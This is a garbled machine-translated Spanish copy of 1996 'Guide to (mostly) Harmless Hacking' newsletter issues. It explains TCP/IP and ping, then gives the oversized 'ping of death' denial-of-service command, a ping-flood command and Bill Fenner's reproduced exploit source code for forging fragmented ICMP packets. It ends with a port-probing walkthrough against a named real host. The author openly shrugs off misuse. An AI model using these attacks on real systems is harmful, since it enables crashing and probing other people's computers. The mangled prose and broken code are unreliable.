conseguir flameado, puede empezar con los sitios Web de soporte de Linux.El mejor que he encontrado es http://sunsite.unc.edu:/pub/Linux/.Incluye la lista Linux Preguntas frecuentes (FAQ), disponible ensunsite.unc.edu:/pub/Linux/docs/FAQ.En el directorio / pub / Linux / docs en sunsite.unc.edu encontrar una serie de otros documentos sobre Linux, incluyendo Linux INFO-SHEET y META-FAQ,El archivo HOWTO Linux est en el sitio Web sunsite.unc.edu en: / pub / Linux / docs / HOWTO.El directorio / pub / Linux / docs / LDP contiene el conjunto actual de manuales LDP.Usted puede obtener `` Instalacin de Linux y Primeros pasos '' en sunsite.unc.edu en / pub / Linux / docs / LDP / install-gua.El archivo README no describe cmo puede solicitar una copia impresa del libro del mismo nombre (alrededor de 180 pginas).Ahora bien, si no te importa conseguir flameado, es posible que desee enviar preguntas a la increble cantidad de grupos de noticias de Usenet que cubren Linux.stas incluyen:comp.os.linux.advocacy Beneficios de Linux compararongranos comp.os.linux.development.system Linux, controladores de dispositivosservidores Window System comp.os.linux.x Linux Xaplicaciones comp.os.linux.apps Escritura LinuxCompatibilidad de hardware comp.os.linux.hardwareinstalacin comp.os.linux.setup Linuxcomp.os.linux.networking Redes y comunicacionescomp.os.linux.answers preguntas frecuentes, cmo-a, archivos LAME, etc.linux.redhat.miscalt.os.linux Uso comp.os.linux. * en lugaralt.uu.comp.os.linux.questions Universidad Usenet le ayudaAnuncios comp.os.linux.announce importantes para Linuxtemas especficos Linux comp.os.linux.miscDeseas que su Linux libre?Tobin Fricke ha sealado que "copias gratuitas de los CD-ROM de Linux estn disponibles el sitio web Linux Soporte y CD Givaway en http://emile.math.ucsb.edu:8000/giveaway.html. Este es un proyecto en el que la gente dona CD de Linux que no necesitan nada ms. El proyecto fue sembrado por los sistemas Linux Labs, que don 800 Linux CDs inicialmente! Por favor, recuerde a donar de su Linux CD cuando haya terminado con ellos. Si usted vive cerca de una reunin de intercambio de ordenador, de Fry, Microcentro, u otro lugar, buscan de all. Por lo general son menos de $ 20, que es una excelente inversin. Personalmente, me gusta Recursos del Linux Desarrollador por Infomagic, que ahora depende de un conjunto de siete CD, creo que Linux CD, que incluye todas las principales distribuciones de Linux (Slackware, RedHat, Debian, Linux para DEC Alpha para nombrar unos pocos), adems de espejos de tsx11.mit.edu y sunsite.unc.edu/pub/linux y mucho ms. Tambin debe visitar la MARAVILLOSA La pgina de linux enhttp://sunsite.unc.edu/linux, que tiene un montn de informacin, as como lahttp://www.linux.org/.Tambin puede ser que desee comprobar hacia fuerahttp://www.redhat.com/ y http://www.caldera.com/ para msinformacin sobre las versiones comerciales de Linux (que todava estn libremente disponibles bajo GNU) ".Qu hay de la seguridad de Linux?S, Linux, al igual que todos los sistemas operativos, es imperfecta.Eminentemente hackeable, si realmente quieres saber.As que si usted quiere saber cmo asegurar su sistema Linux, o si debe venir a travs de uno de los muchos proveedores de Internet que utilizan Linux y quiere ir a explorar (perdn, me olvideescribi eso), aqu es donde usted puede ir para obtener informacin:ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacksftp://info.cert.org/pub/tech_tips/root_compromisehttp://bach.cis.temple.edu/linux/linux-security/http://www.geek-girl.com/bugtraq/Tambin hay ayuda para los usuarios de Linux en Internet Relay Chat (IRC).Ben ([email protected])alberga un canal llamado #linuxhelp en el servidor IRC Undernet.Por ltimo, pero no menos importante, si usted quiere hacer preguntas de Linux en la lista Happy Hacker, eres bienvenido.Podemos ser el ciego gua a otro ciego, pero lodemonios!________________________________________Derechos reservados 1996 Carolyn P. Meinel.Usted puede enviar la GUA PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al final.____________________________________________________________________________________________________GUA PARA (casi) Inofensivo HACKINGVol.2 Nmero 3Introduccin a TCP / IP.Eso significa que los paquetes!Los datagramas!Ping oversize negacin de paquetes de servicio exploit explic.Pero este hack es mucho menos su mayora inofensivas que la mayora.No intente hacer esto en casa ...____________________________________________________________Si usted ha estado en la lista Happy Hacker por un tiempo, usted ha estado recibiendo algunos artculos enviados de la lista Bugtraq sobre un nuevo paquete de ping explotan.Ahora bien, si esto ha sido sonando como un galimatas para usted, reljese.Es realmente muy simple.De hecho, es tan simple que si utiliza Windows 95, para el momento de terminar este artculo usted sabr un simple comando, una lnea que se puede utilizar para bloquear muchos servidores de Internet y routers.*************************************************Usted puede ir a la crcel ADVERTENCIA: Esta vez no voy a implorar a los tipos genio del mal imitador de esta lista para ser virtuoso y resistir la tentacin de hacer mal uso de la informacin que yo estoy a punto de darles.A ver si me importa!Si uno de esos tipos se ve atrapado estrellarse miles de ordenadores conectados a Internet y routers, no slo van a ir a la crcel y obtener un gran bien.Todos vamos a pensar que l o ella es un idiota.Esta explotacin es una obviedad, comando de una lnea desde Windows 95. S, el sistema operativo que est diseado para imbciles despistados.As que no hay nada de lite sobre este hack.Qu es la lite es ser capaz de frustrar este ataque.****************************************************************************************************NEWBIE NOTA: Si los paquetes, los datagramas, y TCP / IP no son exactamente sus amigos del alma, cranme, es necesario conseguir realmente en la cama con ellos con el fin de decir que eres un hacker.As que aguantar aqu por algunas cuestiones tcnicas.Cuandoestamos hecho, usted tendr la satisfaccin de saber que podra causar estragos en Internet, pero son demasiado elite para hacerlo.Un paquete es una forma de enviar informacin por va electrnica que mantiene la posibilidad de errores.La idea es que ninguna tecnologa de transmisin es perfecto.Alguna vez has jugado el juego "telfono"?Usted recibe una docena de personas en un crculo y la primera persona susurra un mensaje a la segunda.Algo as como "El pan es la forma ms baja de trigo."La segunda persona susurra a la tercera, "Un vagabundo es la forma ms baja de hacer trampa."Los terceros susurros, "Ron es la forma ms baja debeber. "Y as sucesivamente. Es muy divertido para averiguar hasta qu punto el mensaje puede mutar ya que pasa alrededor del crculo.Pero cuando, por ejemplo, se obtiene de correo electrnico, usted prefiere que no est en mal estado.As que el equipo que enva el correo electrnico lo rompe en pedacitos llamados datagramas.Luego se envuelve cosas alrededor de cada datagrama que le dicen lo queequipo que necesita para ir a, de dnde viene, y que compruebe si el datagrama podra haber sido mutilado.Estos paquetes de datagramas envueltos son llamados "paquetes".Ahora bien, si la computadora que enva correo electrnico a usted fuera a empaquetar un largo mensaje en un solo paquete, las posibilidades son bastante altas que conseguir en mal estado, mientras que en su camino hacia el otro equipo.Eructos bits.As que cuando el equipo receptor comprueba el paquete y encuentra que qued en mal estado, quese tirarlo a la basura y decir a la otra computadora para enviar de nuevo.Podra tomar un largo tiempo hasta que este paquete gigante recibe a travs intacta.Pero si el mensaje se divide en una gran cantidad de pequeos pedazos y envuelto en manojos de paquetes, la mayora de ellos ser bueno y el equipo receptor los mantendr.A continuacin, decirle a la computadora que enva para retransmitir slo los paquetes que arruinaron.Luego, cuando todas las piezas finalmente llegan all, el equipo receptor los pone juntos en el orden correcto y he aqu, est el, correo electrnico libre de errores completo.TCP / IP significa Protocolo de Control de Transmisin / Protocolo de Internet.Narra los equipos que estn conectados a Internet cmo empaquetar los mensajes en paquetes y cmo leer los paquetes de estos paquetes desde otros ordenadores.Ping utiliza TCP / IP para que sus paquetes.**********************************************"Ping" es un comando que enva un palpador a cabo desde el ordenador a otro ordenador para ver si est encendido y conectado a la misma red que se encuentra.En Internet hay unos diez millones de ordenadores que puede hacer ping.Ping es un comando que puede dar, por ejemplo, desde la Unix, Windows 95 y sistemas operativos Windows NT.Es parte del Protocolo de mensajes de control de Internet (ICMP), que se utiliza para solucionar problemas de redes TCP / IP.Lo que hace es decirle a un equipo remoto a hacerse eco de vuelta un ping.As que si tienes tu mesa de pinghacia atrs, usted sabe que la computadora est vivo.Adems, algunas formas del comando ping tambin le dir cunto tiempo le toma a un mensaje que salir a ese equipo y volver de nuevo.Pero, cmo el equipo sabe que el ping slo envi realmente reson desde el equipo de destino?El datagrama es la respuesta.La mesa de ping enva un datagrama.Si el ping regresar ejerce en este mismo datagrama, sabes que era su tenis que acaba hizo eco de la espalda.El formato bsico de este comando es simplemente:de ping nombre de hostdonde "nombre de host" es la direccin de Internet del equipo que desea revisar.Cuando le doy a este comando desde Sun Release 4.1 Unix, tengo la respuesta "nombre de host est vivo."**************************************CONSEJO TCNICO: Debido a los poderes destructivos de ping, muchos proveedores de servicios Internet esconden el programa ping en sus cuentas de concha, donde los novatos despistados no pueden poner sus manos sobre l.Si su cuenta shell dice "comando no encontrado" cuando se introduce el comando ping, trate de:/ usr / etc / ping nombre de hostSi esto no funciona, o bien probar el comando "ping whereis" o se quejan de soporte tcnico de su proveedor de Internet.Es posible que hayan ddiabled de ping para los usuarios normales, pero si te convences de soporte tcnico eres un buen ciudadano de Internet que pueden dejar de usarlo.*******************************************************************************NEWBIE NOTA: Usted dice que no se puede encontrar una manera de hacer ping desde su servicio on-line?Eso puede ser porque usted no tiene una cuenta shell.Pero hay una cosa que realmente necesita para poder hackear: UNA CUENTA SHELL !!!!La razn por hackers se burlan de las personas con cuentas en lnea Amrica se debe a que los ISP no dar a conocer las cuentas de concha.Esto se debe a America Online quiere que seas buenos chicos y chicas, y no hackear!Una "cuenta shell" es una cuenta de Internet en el que su ordenador se convierte en un terminal de uno de los equipos host de su ISP.Una vez que ests en la "cscara" usted puede dar comandos al sistema operativo (que suele ser Unix) justocomo si estuviera sentado all en la consola de uno de los ejrcitos de su ISP.Puede que ya tenga una cuenta shell, pero simplemente no saben cmo conectarse a la misma.Apoyo llamada tecnologa con su ISP para averiguar si usted tiene uno, y cmo conseguir en l.***************************************Hay todo tipo de variaciones de lujo en el comando ping.Y, adivinen qu, cada vez que hay un comando que usted da a travs de Internet que tiene un montn de variaciones, se puede casi contar con que exista algo hackeable all.Muhahaha!La mesa de ping inundacin es un ejemplo sencillo.Si su sistema operativo le permitir salirse con dar la orden:-> Ping -f nombre de hostenva una verdadera inundacin de pings, tan rpido como mquina host de su ISP puede hacerlos.Esto evita que el host que ha orientado tan ocupado haciendo eco de nuevo sus pings que se puede hacer nada ms.Tambin pone una carga pesada en la red.Los hackers con los niveles primitivos a veces reunirse y utilizar varios de sus ordenadores a la vez para hacer ping al mismo tiempo la computadora host de Internet de alguna vctima.En general, esto mantendr el ordenador de la vctima tambinocupado como para hacer otra cosa.Incluso puede bloquearse.Sin embargo, el lado negativo (de los atacantes punto de vista) es que mantiene los atacantes ordenadores atados, tambin.**************************************NETIQUETTE NOTA: Inundacin ping una computadora es extremadamente grosero.Djate atrapar haciendo esto y usted ser afortunado si lo peor que sucede es que su proveedor de servicios en lnea cierra su cuenta.Hacer esto para un hacker serio y es posible que necesite un trasplante de identidad.Si usted debe comenzar un ping inundacin tipo de por accidente, puede apagarlo, mantenga pulsada la tecla de control y presionando "c" (Ctrl + C).***************************************************************************MAL GENIO TIP: Ping a ti mismo!Si utiliza algn tipo de Unix, el sistema operativo le permitir utilizar su computadora para hacer casi cualquier cosa que s que puede hacer a otros equipos.La direccin de red que te llevade nuevo a su propio equipo host es localhost (o 127.0.0.1).He aqu un ejemplo de cmo utilizo localhost: [65] -> telnet localhostTratando 127.0.0.1 ...Conectado a localhost.Carcter de escape es '^]'.SunOS UNIX (babosa)iniciar sesin:Mira, yo estoy de vuelta a la secuencia de inicio de sesin para el equipo denominado "babosa" todode nuevo.Ahora ping a mi mismo: [68] -> / usr / etc / ping localhostlocalhost est vivoEsto le da el mismo resultado que si yo fuera a comando: [69] -> / usr / etc / ping llamallama.swcp.com est vivo*********************************************************************************Muhahaha CONSEJO: Quieres dar un tirn a la cadena de alguien?Dile a ftp a 127.0.0.1 e inicie sesin utilizando su propio nombre de usuario y contrasea para warez kewl!Mi ex marido Keith Henson hizo eso a la Iglesia de la Cienciologa.El COG ftp-ed a 127.0.0.1 y descubri todos sus escrituras con derechos de autor.Ellosasumido esto fue en el ordenador de Keith, no de ellos.Eran tan * * seguro de que tena sus escrituras que lo llevaron a los tribunales.El juez, cuando se dio cuenta que estaban simplemente repetirse de nuevo a su propia computadora, literalmente, les ri fuera de los tribunales.Para una transcripcin hilarante o cinta de audio de esta sesin de la corte infame, correo electrnico [email protected] es la direccin de correo electrnico de Keith.Me quito el sombrero a un excelente pirata!*******************************************Sin embargo, el paquete de ping oversize exploit que est a punto de aprender lo har an ms dao a algunos hosts que una banda de conspiradores de ping inundacin.Y lo har sin ocupar equipo de los atacantes por ms tiempo que la fraccin de segundo que se necesita para enviar slo un ping.La manera ms fcil de hacer este truco es para ejecutar Windows 95. No tenerlo?En general, usted puede encontrar una tienda de El Cheapo que va a vender a usted por $ 99.Para ello, primero configurar su sistema de Windows 95 para que pueda hacer una conexin PPP o SLIP con Internet mediante el programa de Acceso telefnico a redes bajo el icono Mi PC.Es posible que necesite un poco de ayuda de su apoyo ISP tecnologa en configurar esto.Debe hacerlo de esta manera o este truco no funcionar.Su America Online dialer * * Definitivamente no va a funcionar.************************************NOTA NEWBIE: Si su conexin a Internet le permite ejecutar un navegador web que muestran imgenes, puede utilizar ese nmero de acceso telefnico con su programa de Windows 95 Acceso telefnico a redes para obtener ya sea una conexin PPP o SLIP.************************************A continuacin, obtener su conectado a Internet.Pero no ejecute un navegador o cualquier cosa.En cambio, una vez que su programa Acceso telefnico a redes le dir que usted tiene una conexin, haga clic en el botn "Inicio" y vaya a la lista de "MS-DOS".Abra la ventana de DOS.Usted obtendr un aviso:C: \ windows \>Ahora vamos a hacer esto primero el buen camino ciudadana.En esta pantalla puede escribir un comando ordinario llanura "ping":C: \ windows \ de ping nombre de hostdonde "nombre de host" es la direccin de algn equipo de Internet.Por ejemplo, puede hacer ping thales.nmia.com, que es uno de mis equipos favoritos, el nombre de un filsofo griego oscuro.Ahora bien, si usted pas a conocer la direccin de uno de los ordenadores de Saddam Hussein, sin embargo, es posible que desee dar el comando:c: \ windows \ de ping -l 65510 saddam_hussein's.computer.milAhora realmente no hacer esto a un equipo de verdad!Algunos, pero no todos, los ordenadores se bloquear y, o bien permanecen colgados o reiniciar cuando consiguen este ping.Otros seguirn trabajando alegremente a lo largo, y luego de repente pasar por debajo de horas ms tarde.Por qu?Ese extra aadido -l 65510 crea un datagrama gigante para el paquete de ping.Algunos equipos, cuando se le pregunt a devolver un datagrama idnticos, pongo muy mal estado.Si desea que todos los detalles sangrientos en este ping explotan, incluyendo cmo proteger sus ordenadores de ella, echa un vistazohttp://www.sophist.demon.co.uk/ping.Ahora bien, hay otras maneras de fabricar un ping datagrama gigante adems de utilizar Windows 95. Por ejemplo, si ejecuta ciertas versiones de FreeBSD o Linux de Unix en su PC, puede ejecutar este programa, el cual fue enviado a la lista de Bugtraq.De: Bill Fenner Para: Mltiples destinatarios de la lista BUGTRAQ Asunto: Ping programa de explotarDado que algunas personas no tienen necesariamente de Windows '95 cajas por ah, yo (Fenner) escribi lo siguiente hazaa programa.Se requiere una capa de conexin prima que no se metan con el paquete, por lo BSD 4.3, SunOS y Solaris sona cabo.Trabaja muy bien en sistemas 4.4BSD.Se debe trabajar en Linux si compila con -DREALLY_RAW.Sintase libre de hacer con esto lo que quieres.Utilice esta herramienta slo para poner a prueba sus propias mquinas, y de no chocar a otros '.* Win95ping.c** Simular el win95 "ping -l 65510 buggyhost" mal.* Versin 1.0 Bill Fenner 22-Oct-1996** Esto requiere sockets crudos que no ensucia con el paquete del todo (otra* Que la adicin de la suma de comprobacin).Eso significa que SunOS, Solaris y* Los sistemas basados en BSD4.3 estn fuera.Sistemas BSD4.4 (FreeBSD, NetBSD,* OpenBSD, BSDI) funcionar.Linux podra funcionar, yo no tengo un Linux* Sistema de probarlo en.** El ataque de la caja Win95 se ve as:* 17: 26: 11.013622 cslwin95> arkroyal: icmp: echo peticin (frag 6144: 1480 @ 0 +)* 17: 26: 11.015079 cslwin95> arkroyal: (frag 6144: 1480 @ 1480 +)* 17: 26: 11.016637 cslwin95> arkroyal: (frag 6144: 1480 @ 2960 +)* 17: 26: 11.017577 cslwin95> arkroyal: (frag 6144: 1480 @ 4440 +)* 17: 26: 11.018833 cslwin95> arkroyal: (frag 6144: 1480 @ 5920 +)* 17: 26: 11.020112 cslwin95> arkroyal: (frag 6144: 1480 @ 7400 +)* 17: 26: 11.021346 cslwin95> arkroyal: (frag 6144: 1480 @ 8880 +* 17: 26: 11.022641 cslwin95> arkroyal: (frag 6144: 1480 @ 10360 +)* 17: 26: 11.023869 cslwin95> arkroyal: (frag 6144: 1480 @ 11840 +)* 17: 26: 11.025140 cslwin95> arkroyal: (frag 6144: 1480 @ 13320 +)* 17: 26: 11.026604 cslwin95> arkroyal: (frag 6144: 1480 @ 14800 +)* 17: 26: 11.027628 cslwin95> arkroyal: (frag 6144: 1480 @ 16280 +)* 17: 26: 11.028871 cslwin95> arkroyal: (frag 6144: 1480 @ 17760 +)* 17: 26: 11.030100 cslwin95> arkroyal: (frag 6144: 1480 @ 19240 +)* 17: 26: 11.031307 cslwin95> arkroyal: (frag 6144: 1480 @ 20720 +)* 17: 26: 11.032542 cslwin95> arkroyal: (frag 6144: 1480 @ 22200 +)* 17: 26: 11.033774 cslwin95> arkroyal: (frag 6144: 1480 @ 23680 +)* 17: 26: 11.035018 cslwin95> arkroyal: (frag 6144: 1480 @ 25160 +)* 17: 26: 11.036576 cslwin95> arkroyal: (frag 6144: 1480 @ 26640 +)* 17: 26: 11.037464 cslwin95> arkroyal: (frag 6144: 1480 @ 28120 +)* 17: 26: 11.038696 cslwin95> arkroyal: (frag 6144: 1480 @ 29600 +)* 17: 26: 11.039966 cslwin95> arkroyal: (frag 6144: 1480 @ 31080 +)* 17: 26: 11.041218 cslwin95> arkroyal: (frag 6144: 1480 @ 32560 +)* 17: 26: 11.042579 cslwin95> arkroyal: (frag 6144: 1480 @ 34040 +)* 17: 26: 11.043807 cslwin95> arkroyal: (frag 6144: 1480 @ 35520 +)* 17: 26: 11.046276 cslwin95> arkroyal: (frag 6144: 1480 @ 37000 +)* 17: 26: 11.047236 cslwin95> arkroyal: (frag 6144: 1480 @ 38480 +)* 17: 26: 11.048478 cslwin95> arkroyal: (frag 6144: 1480 @ 39960 +)* 17: 26: 11.049698 cslwin95> arkroyal: (frag 6144: 1480 @ 41440 +)* 17: 26: 11.050929 cslwin95> arkroyal: (frag 6144: 1480 @ 42920 +)* 17: 26: 11.052164 cslwin95> arkroyal: (frag 6144: 1480 @ 44400 +)* 17: 26: 11.053398 cslwin95> arkroyal: (frag 6144: 1480 @ 45880 +)* 17: 26: 11.054685 cslwin95> arkroyal: (frag 6144: 1480 @ 47360 +)* 17: 26: 11.056347 cslwin95> arkroyal: (frag 6144: 1480 @ 48840 +)* 17: 26: 11.057313 cslwin95> arkroyal: (frag 6144: 1480 @ 50320 +)* 17: 26: 11.058357 cslwin95> arkroyal: (frag 6144: 1480 @ 51800 +)* 17: 26: 11.059588 cslwin95> arkroyal: (frag 6144: 1480 @ 53280 +)* 17: 26: 11.060787 cslwin95> arkroyal: (frag 6144: 1480 @ 54760 +)* 17: 26: 11.062023 cslwin95> arkroyal: (frag 6144: 1480 @ 56240 +)* 17: 26: 11.063247 cslwin95> arkroyal: (frag 6144: 1480 @ 57720 +)* 17: 26: 11.064479 cslwin95> arkroyal: (frag 6144: 1480 @ 59200 +)* 17: 26: 11.066252 cslwin95> arkroyal: (frag 6144: 1480 @ 60680 +)* 17: 26: 11.066957 cslwin95> arkroyal: (frag 6144: 1480 @ 62160 +)* 17: 26: 11.068220 cslwin95> arkroyal: (frag 6144: 1480 @ 63640 +)* 17: 26: 11.069107 cslwin95> arkroyal: (frag 6144: 398 @ 65120)** /#include #include #include #include #include #include #include #include / ** Si su kernel no muck con paquetes primas, REALLY_RAW #define.* Esta es, probablemente, slo Linux.* /#ifdef REALLY_RAWREVISIN #define (x) htons (x)#elseREVISIN #define (x) (x)#terminara siintmain (int argc, char ** argv){int s;Char buf [1500];struct ip * ip = buf (struct ip *);struct icmp * icmp = (struct icmp *) (ip + 1);struct hostent * hp;dst sockaddr_in estructura;int desplazamiento;int on = 1;bzero (buf, buf sizeof);if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_IP)) h_addr_list [0], y IP-> ip_dst.s_addr, HP-> h_length);}printf ("Envo a% s \ n", inet_ntoa (IP-> ip_dst));IP-> ip_v = 4;IP-> ip_hl = sizeof * ip >> 2;IP-> IP_TOS = 0;IP-> ip_len = FIX (buf sizeof);IP-> ip_id = htons (4321);IP-> ip_off = FIX (0);IP-> IP_TTL = 255;IP-> ip_p = 1;IP-> ip_sum = 0;/ * Kernel rellena * /IP-> ip_src.s_addr = 0;/ * Kernel rellena * /dst.sin_addr = IP-> ip_dst;dst.sin_family = AF_INET;icmp-> ICMP_TYPE = ICMP_ECHO;icmp-> ICMP_CODE = 0;icmp-> icmp_cksum = htons (~ (ICMP_ECHO > 3);si (offset ip_off | = FIX (IP_MF);msIP-> ip_len = FIX (418);/ * Hacer total de 65.538 * /si (sendto (s, buf, sizeof buf, 0, (struct sockaddr *) y el horario de verano,dst sizeof) ICMP_TYPE = 0;icmp-> ICMP_CODE = 0;icmp-> icmp_cksum = 0;}}}(Fin de la mesa de ping de Fenner explotar mensaje.)********************************************Usted puede ir a la crcel NOTA: No slo es este hack no de lite, si usted est leyendo esto usted no sabe lo suficiente para no ser pillado de hacer este ping truco.Por otro lado, si usted fuera a hacerlo a un host de Internet en Irak ...********************************************Por supuesto que hay muchas otras cosas kewl que puedes hacer con ping.Si usted tiene una cuenta shell, usted puede encontrar un montn de stuph acerca de ping dando el comando:hombre de pingDe hecho, usted puede conseguir un montn de detalles sobre cualquier comando de Unix con "el hombre".Divirtete con mesa de ping - y ser bueno!Pero recuerda, no estoy pidiendo a los aspirantes a genios malignos que ser bueno.A ver si me importa cuando llegas reventado ..._________________________________________________________Para suscribirse, correo electrnico [email protected] con el mensaje "subscribe hh." Para m, enva un correo electrnico confidencial (por favor, no hay discusin de actividades ilegales) utilizan [email protected] favor, llamas directos adev/[email protected] feliz!Derechos reservados 1996 Carolyn P. Meinel.Usted puede enviar la GUA PARA (casi) Inofensivo HACKING, siempre y cuando salga de este aviso al final ..____________________________________________________________________________________________________________________GUA PARA (casi) Inofensivo HACKINGVol.2 Nmero 4Ms intro de TCP / IP: port surfing!Demonios!Cmo conseguir en casi cualquier ordenador sin necesidad de acceder y sin infringir la ley.Impresiona a tus amigos despistados y en realidad descubren kewl,, stuph seguridad jurdica.____________________________________________________________Hace unos das tuve una amiga visitar.Ella es 42 y no posee una computadora.Sin embargo, ella est tomando una clase en computadoras personales en un colegio comunitario.Quera saber lo que todo esto stuph piratera se trata.As que decid presentarla al surf puerto.Y mientras lo hace, nos tropezamos con algo kewl.Puerto de surf se aprovecha de la estructura de TCP / IP.Este es el protocolo (conjunto de reglas) que se utiliza para que las computadoras se comuniquen entre s a travs de Internet.Uno de los principios bsicos de Unix (el sistema operativo ms popular en Internet) es asignar un "puerto" de todas las funciones que un ordenador puede comandar otra para llevar a cabo.Los ejemplos ms comunes son para enviar y recibir correo electrnico, leer grupos de noticias Usenet, telnet, transferir archivos y pginas web oferta.************************Newbie nota # 1: Un puerto de la computadora es un lugar donde la informacin va en o fuera de ella.En el ordenador de casa, ejemplos de puertos son el monitor, el cual enva informacin hacia fuera, el teclado y el ratn, que enva la informacin, y el mdem, el cual enva informacin tanto fuera y por dentro.Sin embargo, un equipo host de Internet como callisto.unm.edu tiene muchos ms puertos que un ordenador personal tpico.Estos puertos se identifican por nmeros.Ahora bien, estos no son todos los puertos fsicos, como un teclado o un puerto serie RS232 (para el mdem).Son (software) puertos virtuales.Un "servicio" es un programa que se ejecuta en un "puerto". Cuando haces telnet a un puerto, que el programa est en marcha, a la espera de su entrada.Piratera feliz!************************As que si quieres leer una pgina Web, sus contactos navegador nmero de puerto 80 y le dice al equipo que administra ese sitio web para entrar. Y, por supuesto, te metes en ese equipo servidor Web sin contrasea.OK, gran cosa.Eso es bastante estndar para Internet.Muchos - la mayora - ordenadores en Internet le permitir hacer algunas cosas con ellos sin necesidad de una contrasea,Sin embargo, la esencia de la piratera est haciendo cosas que no son obvias.Que no slo saltan a la vista de los manuales.Una forma puede mover un paso adelante respecto a la carrera del usuario de la computadora molino es aprender a puerto surf.La esencia del surf puerto es seleccionar un equipo de destino y explorar para ver qu puertos estn abiertos y lo que puede hacer con ellos.Ahora bien, si eres un hacker perezoso puede utilizar herramientas de hackers enlatados como Satn o Netcat.Estos son los programas que se pueden ejecutar desde Linux, FreeBSD o Solaris (todos los tipos de Unix) desde su PC.Ellos buscan automticamente los equipos de destino.Ellos le dirn qu puertos estn en uso.Tambin sondear estos puertos para la presencia de demonios con fallas de seguridad saber, y decirte lo que son.********************************Newbie nota # 2: Un demonio no es una especie de grinch o gremlin o 666 tipo.Es un programa que se ejecuta en segundo plano en muchos puertos del sistema (pero no todos) de Unix.Espera a que venga a lo largo y lo utilizan.Si usted encuentra un demonio en un puerto, es probable que sea hackeable.Algunas herramientas de hackers le dirn cules son las caractersticas hackable son de los demonios que detectan.********************************Sin embargo, hay varias razones a los puertos de surf a mano en lugar de forma automtica.1) Usted aprender algo.Sondeo manualmente se obtiene una sensacin de la tripa de cmo el demonio que se ejecuta en ese puerto se comporta.Es la diferencia entre ver una pelcula porno y (rubor).2) Usted puede impresionar a sus amigos.Si ejecuta una herramienta de pirateo informtico enlatados como Satans tus amigos te miran y dicen: "Gran cosa.Puedo ejecutar programas, tambin. "Van a ponerse inmediatamente en el pequeo y sucio secreto del mundo de piratera informtica.La mayora de las hazaas de hacking son slo lamerz ejecutando programas que recogieron de algunos BBS o sitio ftp.Pero si escribe comandos de pulsaciones de teclas por pulsacin de tecla se ver que el uso de su cerebro.Y usted puede ayudar a que jueguen con los demonios, tambin, y darles una oleada gigante.3) Los hackers verdaderamente lite navegar puertos y juegan con los demonios con la mano, ya que es la nica manera de descubrir algo nuevo.Hay slo unos pocos cientos de hackers - como mximo - que descubren nueva stuph.El resto simplemente ejecutar hazaas conserva una y otra y otra vez.Boring.Pero te estoy enseando cmo llegar a la cima del hacker.Ahora djame decirte lo que mi amigo media edad y yo descubrimos simplemente andar por ah.En primer lugar, decidimos que no queramos perder el tiempo jugando con algn pequeo equipo host menor.Hey, vamos a ir para el gran momento!As que, cmo encontrar un ordenador Kahuna grande en Internet?Empezamos con un dominio que consista en una LAN de PCs con Linux que se me ocurri ya conocer, que es utilizado por el acceso a Internet de Nuevo Mxico ISP: nmia.com.*****************************Newbie Nota # 3: Un dominio es una direccin de Internet.Se puede utilizar para buscar que dirige los ordenadores utilizados por el dominio, y tambin para mirar hacia arriba cmo ese dominio est conectado al resto de Internet.*****************************As que para hacer esto, primero ingresar con mi cuenta shell con Southwest Cyberport.Le di el comando: [66] -> whois nmia.comAcceso a Internet de Nuevo Mxico (NMIA-DOM)2201 Buena Vista SEAlbuquerque, NM 87106Nombre de Dominio: NMIA.COMContacto Administrativo, Tcnico Contacto, Zona de Contacto:Orrell, Stan (SO11) [email protected](505) 877-0617Registro de la ltima actualizacin 11-Mar-94.Registro creado el 11-Mar-94.Servidores de dominio en orden indicado:NS.NMIA.COM 198.59.166.10GRANDE.NM.ORG 129.121.1.2Ahora es una buena apuesta que grande.nm.org est cumpliendo una gran cantidad de otros servidores de Internet junto nmia.com.As es como nos puerto navegar por nuestra manera de averiguarlo: [67] -> telnet grande.nm.org 15Tratando 129.121.1.2 ...Conectado a grande.nm.org.Carcter de escape es '^]'.TGV MultiNet V3.5 Rev B, VAX 4000-400, OpenVMS VAX V6.1Licencia del producto Fecha de Vencimiento de Autorizacin---------- ------- ------------- ---------------MULTINET S A-137-1641 (ninguno)NFS-CLIENTE S A-137-113237 (ninguno)*** Configuracin de archivo "MULTINET: NETWORK_DEVICES.CONFIGURATION" ***Banderas de dispositivos RSE adaptador Direccin / Vector------ ------- ----------- ------------SE0 (Compartido VMS Ethernet / FDDI) -ningunos- -ningunos-MultiNet Conexiones activas, incluidos los servidores:Proto RCV-Q Snd-Q Direccin Local (Puerto) Direccin de Relaciones Exteriores (Puerto) Estado----- ----- ----- ------------------ ----------------- - -----TCP 0 822 GRANDE.NM.ORG (NETSTAT) 198.59.115.24 (1569) ESTABLECIDOTCP 0 0 GRANDE.NM.ORG (POP3) 164.64.201.67 (1256) estableciTCP 0 0 GRANDE.NM.ORG (4918) 129.121.254.5 (TELNET) ESTABLECIDOTCP 0 0 GRANDE.NM.ORG (TELNET) AVATAR.NM.ORG (3141) estableciTCP 0 0 * (NameService) * (*) ESCUCHARTCP 0 0 * (TELNET) * (*) ESCUCHARTCP 0 0 * (FTP) * (*) ESCUCHARTCP 0 0 * (DEDO) * (*) ESCUCHARTCP 0 0 * (NETSTAT) * (*) ESCUCHARTCP 0 0 * (SMTP) * (*) ESCUCHARTCP 0 0 * (Entrar) * (*) ESCUCHARTCP 0 0 * (SHELL) * (*) ESCUCHARTCP 0 0 * (EXEC) * (*) ESCUCHARTCP 0 0 * (RPC) * (*) ESCUCHARTCP 0 0 * (NetControl) * (*) ESCUCHARTCP 0 0 * (SYSTAT) * (*) ESCUCHARTCP 0 0 * (CHARGEN) * (*) ESCUCHARTCP 0 0 * (durante el da) * (*) ESCUCHARTCP 0 0 * (TIME) * (*) ESCUCHETCP 0 0 * (ECHO) * (*) ESCUCHARTCP 0 0 * (DESCARTAR) * (*) ESCUCHARTCP 0 0 * (IMPRESORA) * (*) ESCUCHARTCP 0 0 * (POP2) * (*) ESCUCHARTCP 0 0 * (POP3) * (*) ESCUCHARTCP 0 0 * (KERBEROS_MASTER) * (*) ESCUCHARTCP 0 0 * (klogin) * (*) ESCUCHARTCP 0 0 * (kshell) * (*) ESCUCHARTCP 0 0 GRANDE.NM.ORG (4174) OSO.NM.ORG (X11) ESTABLECIDOTCP 0 0 GRANDE.NM.ORG (4172) OSO.NM.ORG (X11) ESTABLECIDOTCP 0 0 GRANDE.NM.ORG (4171) OSO.NM.ORG (X11) ESTABLECIDOTCP 